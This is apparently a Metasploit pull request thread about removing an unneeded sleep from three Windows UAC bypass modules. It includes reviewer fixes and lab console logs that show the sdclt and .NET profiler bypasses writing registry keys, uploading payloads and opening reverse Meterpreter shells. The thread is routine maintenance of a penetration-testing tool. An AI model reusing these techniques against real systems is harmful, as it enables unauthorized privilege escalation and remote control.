Remove unnecesary sleep in several bypassuac modules

[smashery]

This PR resolves a bug in several UAC bypass modules, which perform a sleep to await a shell before performing cleanup. The sleep is unnecessary, as the exploit driver already has the functionality to wait for a shell before performing cleanup.

The existing user experience feels frustrating ("what's it waiting for" or "Why hasn't it started my handler?"), which leads to a greater likelihood that the user will Ctrl+C out once the shell succeeds, preventing the cleanup and leaving more artifacts on disk.

Previous behaviour:

• For a reverse shell:
  • The exploit starts
  • The sleep starts
  • The exploit succeeds almost immediately, and we get a shell
  • We continue waiting for 20 seconds
  • The cleanup occurs
  • We enter our shell
• For a bind shell:
  • The exploit starts
  • The sleep starts
  • The exploit succeeds almost immediately, but we haven't started a handler yet
  • We continue waiting for 20 seconds
  • The cleanup occurs
  • The handler starts, and we gain a shell.

The new behaviour avoids the sleep, and leverages the existing cleanup method, so cleanup occurs as soon as we get the shell.

Verification

• For each module:
• Set verbose to true (so you can see the cleanup)
• Test success with a reverse payload - should immediately cleanup and drop into the shell
• Test success with a bind payload - should immediately cleanup and drop into the shell
• Test failed exploit - should wait an appropriate amount of time, and cleanup
• Test invalid version - should terminate immediately, and cleanup should do nothing

[smcintyre-r7]

Alright I was able to test and verify all three modules are working as intended now. I am going to make a change as I push this up though. The logic for all three #cleanup methods starts with unless @something.empty? which is fine for exploitation, but caused a NoMethodError when the module's check was used. I'm changing them all to if @something.present? which will ensure that the value is set and not empty.

Exception output:

msf6 exploit(windows/local/bypassuac_sdclt) > recheck
[*] Reloading module...

[-] Msf::OptionValidateError The following options failed to validate: SESSION
[-] Check failed: The state could not be determined.
msf6 exploit(windows/local/bypassuac_sdclt) >

#present? examples:

[1] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)> nil.present?
=> false
[2] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)> [].present?
=> false
[3] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)> [nil].present?
=> true
[4] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)>

I'm also fixing the output of the messages regarding the manual cleanup. It's a little confusing because they have an opening ' but not a closing one. It makes you wonder if the ! is a literal.

Everything else looks good, thanks for this patch!

[smcintyre-r7]

Testing output

msf6 exploit(windows/local/bypassuac_dotnet_profiler) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\SMCINT~1\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\SMCINT~1\AppData\Local\Temp\IMPHALxjUkl.dll
[*] UUID = b69e4605-8eac-497f-8d7f-d6e521bc0fb8
[*] Writing  to HKCU\Software\Classes\CLSID\{b69e4605-8eac-497f-8d7f-d6e521bc0fb8}\InprocServer32
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\SMCINT~1\AppData\Local\Temp\IMPHALxjUkl.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\SMCINT~1\AppData\Local\Temp\IMPHALxjUkl.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Meterpreter session 5 opened (192.168.250.134:4444 -> 192.168.250.237:56463) at 2022-12-12 16:19:43 -0500
[*] Removing Registry Changes
[*] Deleting HKCU\Software\Classes\CLSID\{b69e4605-8eac-497f-8d7f-d6e521bc0fb8}\InprocServer32 key
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed

meterpreter >

msf6 exploit(windows/local/bypassuac_sdclt) > show options 

Module options (exploit/windows/local/bypassuac_sdclt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       -1               yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     555              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/bypassuac_sdclt) > run
msf6 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.159.128:555 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Sending stage (200774 bytes) to 192.168.159.120
[!] This exploit requires manual cleanup of 'C:\Users\SMCINT~1\AppData\Local\Temp\SDwPazM.exe!
[*] Please wait for session and cleanup....
[*] Meterpreter session 6 opened (192.168.159.128:555 -> 192.168.159.120:49168) at 2022-12-12 16:20:26 -0500
[*] Registry Changes Removed

meterpreter > exit
[*] Shutting down Meterpreter...
s
[*] 192.168.159.120 - Meterpreter session 6 closed.  Reason: User exit
msf6 exploit(windows/local/bypassuac_sdclt) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.159.128:555 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\SMCINT~1\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] exploit_file = C:\Windows\System32\sdclt.exe
[*] payload_pathname = C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe
[*] Making Payload
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe
[*] Uploading Payload to C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\sdclt.exe
[*] Sending stage (200774 bytes) to 192.168.159.120
[!] This exploit requires manual cleanup of 'C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe!
[*] Please wait for session and cleanup....
[*] Meterpreter session 7 opened (192.168.159.128:555 -> 192.168.159.120:49169) at 2022-12-12 16:20:38 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter >

[smcintyre-r7]

Release Notes

This updates three UAC bypass modules to remove a hard coded delay in favor of using the module's builtin cleanup method. This results in the user having access to the interactive session without needing to wait.